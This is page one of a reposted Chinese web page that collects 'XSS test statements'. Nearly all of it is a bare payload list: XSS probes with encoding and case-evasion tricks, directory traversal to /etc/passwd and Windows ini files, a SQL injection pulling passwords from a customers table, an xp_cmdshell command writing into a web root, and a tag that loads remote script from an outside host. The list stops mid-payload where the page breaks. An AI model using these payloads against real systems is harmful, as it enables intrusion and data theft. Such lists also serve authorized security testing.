当前位置: 网学 > 编程文档 > ASP > 正文

XSS测试语句大全

来源:Http://myeducs.cn 联系QQ:点击这里给我发消息 作者: 用户投稿 来源: 网络 发布时间: 13/06/17

网学网为广大网友收集整理了,XSS测试语句大全,希望对大家有所帮助!

''><script>alert(document.cookie)</script>
=''><script>alert(document.cookie)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
%3Cscript%3Ealert(''XSS'')%3C/script%3E
<script>alert(''XSS'')</script>
<img src="javascript:alert(''XSS'')">
%0a%0a<script>alert(\"Vulnerable\")</script>.jsp
%22%3cscript%3ealert(%22xss%22)%3c/script%3e
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html
%3f.jsp
%3f.jsp
<script>alert(''Vulnerable'');</script>
<script>alert(''Vulnerable'')</script>
?sql_debug=1
a%5c.aspx
a.jsp/<script>alert(''Vulnerable'')</script>
a/
a?<script>alert(''Vulnerable'')</script>
"><script>alert(''Vulnerable'')</script>
'';exec%20master..xp_cmdshell%20''dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt''--&&
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
%3Cscript%3Ealert(document. domain);%3C/script%3E&
%3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=
1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=
../../../../../../../../etc/passwd
..\..\..\..\..\..\..\..\windows\system.ini
\..\..\..\..\..\..\..\..\windows\system.ini
'''';!--"<XSS>=&{()}
<IMG SRC="javascript:alert(''XSS'');">
<IMG SRC=javascript:alert(''XSS'')>
<IMG SRC=JaVaScRiPt:alert(''XSS'')>
<IMG SRC=JaVaScRiPt:alert("XSS")>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC="jav ascript:alert(''XSS'');">
<IMG SRC="jav ascript:alert(''XSS'');">
<IMG SRC="jav ascript:alert(''XSS'');">
"<IMG SRC=java\0script:alert(\"XSS\")>";'' > out
<IMG SRC=" javascript:alert(''XSS'');">
<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
<BODY BACKGROUND="javascript:alert(''XSS'')">
<BODY ONLOAD=alert(''XSS'')>
<IMG DYNSRC="javascript:alert(''XSS'')">
<IMG LOWSRC="javascript:alert(''XSS'')">
<BGSOUND SRC="javascript:alert(''XSS'');">
<br size="&{alert(''XSS'')}">
<LAYER SRC="http://xss.ha.ckers.org/a.js"></layer>
<LINK REL="stylesheet" HREF="javascript:alert(''XSS'');">
<IMG SRC=''vbscript:msgbox("XSS")''>
<IMG SRC="mocha:[code]">
<IMG SRC=
12下一页
点击进入论坛和大家一起交流设计,分享设计素材,结交设计朋友
  • 上一篇资讯: 跨站脚本执行漏洞详解与防护
  • 下一篇资讯: Mssql高级注入笔记II

    • 相关资讯

    网学推荐

    免费论文

    原创论文

    文章排行榜

  • · 披着羊皮的大野狼 ASP中Session技
  • · ASP中实现小偷程序的原理和简单示例
  • · ASP中遍历和操作Application对象的
  • · 在ASP中操作HTTP报头方法分析
  • · ASP中使用ServerVariables集合详解
  • · 在ASP中访问和更新Cookies集合
  • · 借他人的程序造自己的家园 菜鸟也会
  • · 20种看ASP程序源码的方法及工具
  • · ASP中使用Form和QueryString集合
  • · 在ASP中轻松实现记录集分页显示
  • · ASP内置对象Request和Response详解
  • · ACT3.0 bug及修改方法
  • · 使用jmail发送邮件
  • · asp将字符串转数字的函数
  • · ASP生成静态 非常简单 可以使用模板
  • · 在ASP中使用CDO发送邮件 非jmai
  • · 二进制转十进制,十进制转二进制的算
  • · 防范ASP木马最有效的方法
    • 浏览:
    设为首页 | 加入收藏 | 论文首页 | 论文专题 | 设计下载 | 网学软件 | 论文模板 | 论文资源 | 程序设计 | 关于网学 | 站内搜索 | 网学留言 | 友情链接 | 资料中心
    版权所有 QQ:3710167 邮箱:3710167@qq.com 网学网 [Myeducs.cn] 您电脑的分辨率是 像素
    Copyright 2008-2015 myeducs.Cn www.myeducs.Cn All Rights Reserved
    湘ICP备09003080号